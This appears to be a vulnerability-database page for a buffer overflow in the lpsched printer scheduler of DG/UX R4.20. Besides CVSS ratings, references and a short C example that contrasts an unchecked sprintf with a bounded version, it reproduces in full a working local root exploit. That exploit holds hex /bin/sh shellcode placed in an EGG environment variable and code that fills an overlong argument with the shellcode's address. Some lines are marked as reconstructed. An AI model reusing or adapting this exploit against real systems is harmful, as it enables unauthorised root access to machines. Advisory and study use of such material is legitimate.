Published: 2001-06-27 00:00:00
Revised: 2016-10-17 22:10:50

[Original] Buffer overflow in lpsched on DGUX version R4.20MU06 and MU02 allows a local attacker to obtain root access via a long command line argument (non-existent printer name).


        lpsched in DGUX versions R4.20MU06 and MU02 contains a buffer overflow. A local attacker can obtain root access via an over-long command line argument (a non-existent printer name).

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20010319 DGUX lpsched buffer overflow
(VENDOR_ADVISORY)  XF  dgux-lpsched-bo

- Vulnerability information

High  Buffer overflow
2001-06-27 00:00:00 2005-10-20 00:00:00

- Advisories and patches


- Vulnerability information (20697)

DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability (EDBID:20697)
unix local
2001-03-19 Verified
0 Luciano Rocha
N/A

DGUX is the Data General revision of UNIX. It is designed as a solution for Intel systems produced by Data General.

A problem in the handling of error messages by the printer scheduler could allow arbitrary execution of code. By placing a request to the lpsched program consisting of a long and non-existing host name, it is possible to take advantage of a buffer overflow in the error reporting code of the lpsched program.

Therefore, it is possible for a local user to execute arbitrary code with the euid of root. 
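The bug class behind this entry, as an added illustration written for this page (it is not DG/UX source and not part of the exploit below): an error message formatted from an unchecked printer name into a fixed stack buffer, beside a bounded, validating version. MSG_MAX, PRINTER_NAME_MAX and the message text are assumed values chosen for the example, not DG/UX constants.

```c
#include <stdio.h>
#include <string.h>

#define MSG_MAX 64          /* fixed-size message buffer: the vulnerable shape */
#define PRINTER_NAME_MAX 14 /* assumed limit for this example, not a DG/UX constant */
#define MSG_FMT "lpsched: unknown printer \"%s\"\n"

/* Vulnerable shape (the pattern the advisory describes): the error text is
 * built from the caller-supplied printer name with no length check, so
 * sprintf writes as many bytes as the name needs and a long name runs
 * past msg into the saved frame.  Shown for comparison only; not called. */
void unknown_printer_unsafe(const char *name)
{
    char msg[MSG_MAX];
    sprintf(msg, MSG_FMT, name);
    fputs(msg, stderr);
}

/* Bytes the formatted message needs, excluding the NUL: shows how short an
 * input already exceeds MSG_MAX. */
size_t unknown_printer_msg_len(const char *name)
{
    return (size_t)snprintf(NULL, 0, MSG_FMT, name);
}

/* 1 if unknown_printer_unsafe(name) would overrun msg, else 0. */
int would_overflow(const char *name)
{
    return unknown_printer_msg_len(name) + 1 > MSG_MAX;
}

/* Hardened form: validate the untrusted field before it reaches any buffer,
 * then format with a bounded call and refuse to continue on truncation.
 * Returns 0 and fills out, -1 if the name is rejected, -2 if out is too small. */
int unknown_printer_safe(const char *name, char *out, size_t outsz)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-";
    size_t n = strlen(name);
    int w;

    if (n == 0 || n > PRINTER_NAME_MAX || strspn(name, allowed) != n)
        return -1;
    w = snprintf(out, outsz, MSG_FMT, name);
    if (w < 0 || (size_t)w >= outsz)
        return -2;          /* truncated: an error, never a silent partial write */
    return 0;
}
```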

/*
 *	Stack Smasher by Luciano Rocha, (c) 1999
 *	 for dgux (Data General's UN*X) on x86
 *
 *	To compile: cc -o squash-dgux-x86 squash-dgux-x86.c
 *
 *	To use: squash-dgux-x86 <length> <program to squash> [params of prog]
 *		EGG [other params of prog]
 *
 *	For a list of programs and their respective lengths see my home page,
 *		currently at
 *
 *	My email:
 *
 *	Disclaimer: I take no responsibility for whatever may result from using
 *		this program, nor do I suggest illegal use of it.
 *		You are on your own.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>	/* strcmp, memset */
#include <strings.h>
#include <unistd.h>

char maker[] = "Generic stack-smasher for dgux-x86 by Luciano Rocha, (c) 1999.\n";

/* Environment entry "EGG=<payload>"; stage 2 locates the payload with getenv("EGG"). */
char sc[] = {
	'E', 'G', 'G', '=',
	0x33, 0xc0, 0x33, 0xc9, 0x80, 0xc1, 0x68, 0x66, 0x51, 0x66, 0x68, 0x2f,
	0x73, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x8b, 0xdc, 0x50, 0x53, 0x80, 0xc1,
	0xdf, 0x66, 0x51, 0x50, 0x66, 0xba, 0x90, 0x9a, 0x66, 0x52, 0x66, 0x68,
	0x33, 0xc0, 0x66, 0x51, 0x50, 0x66, 0x52, 0x66, 0x68, 0x90, 0x58, 0x66,
	0x51, 0x50, 0x66, 0x52, 0x8b, 0xcc, 0x8b, 0xd3, 0x81, 0xc2, 0xf8, 0xff,
	0xff, 0xff, 0x52, 0x52, 0x53, 0x50, 0x04, 0x11, 0x50, 0x51, 0x04, 0x25,
	0xc3, 0x00
};

/* Stage 1 (no EGG in the environment yet): replace the "EGG" argument with a
 * buffer of <size> NOP bytes, export the payload, and re-exec this program
 * with argv shifted so that argv[0] becomes the program to smash. */
int prepare2(int argc, char *argv[]) {
	int len, off;
	char *buff;
	if (argc < 4) {
		fprintf(stderr, "%s <size> <prog_to_smash> [args] EGG "
			"[args].\n", argv[0]);
		return 1;
	}
	for (off = 1; off < argc && strcmp(argv[off], "EGG"); ++off);
	if (off >= argc) {
		fprintf(stderr, "%s: no EGG parameter specified. Aborting.\n",
			argv[0]);
		return 1;
	}
	len = strtol(argv[1], NULL, 0);
	buff = (char *) malloc(len + 1);
	buff[len] = '\0';
	memset(buff, 0x90, len);
	argv[off] = buff;
	/* Reconstructed: this call is missing from the page as extracted, but
	 * sc is otherwise unused and stage 2 depends on getenv("EGG"). */
	putenv(sc);
	execv(argv[0], argv+2);
	return 1;
}

/* Stage 2 (EGG present): fill the NOP-filled argument with repeated copies of
 * the payload's address (32-bit x86 assumed), then exec the target with it. */
int dosquash(int argc, unsigned char *argv[]) {
	char *p;
	int pos, ptr;
	int *d;

	p = getenv("EGG");
	fprintf(stderr, "%s: EGG == %p, EGG[0] == 0x%x\n", argv[0], p, *p);
	pos = 1;
	while (argv[pos] && *argv[pos] != 0x90) ++pos;
	if (!argv[pos]) {
		fprintf(stderr, "%s: no place to squash...\n", argv[0]);
		return 1;
	}
	d = (int *) argv[pos];
	ptr = (int) p;
	while (*d == 0x90909090) *d++ = ptr;
	execv((char *) argv[0], (char *const *) argv);
	return 1;
}

int main(int argc, char *argv[]) {

	if (getenv("EGG")) dosquash(argc, (unsigned char **)argv);
	else prepare2(argc, argv);
	return 1;
}
- Vulnerability information

DG/UX lpsched Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-03-20 Unknown
2001-03-20 Unknown

- Solution


Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete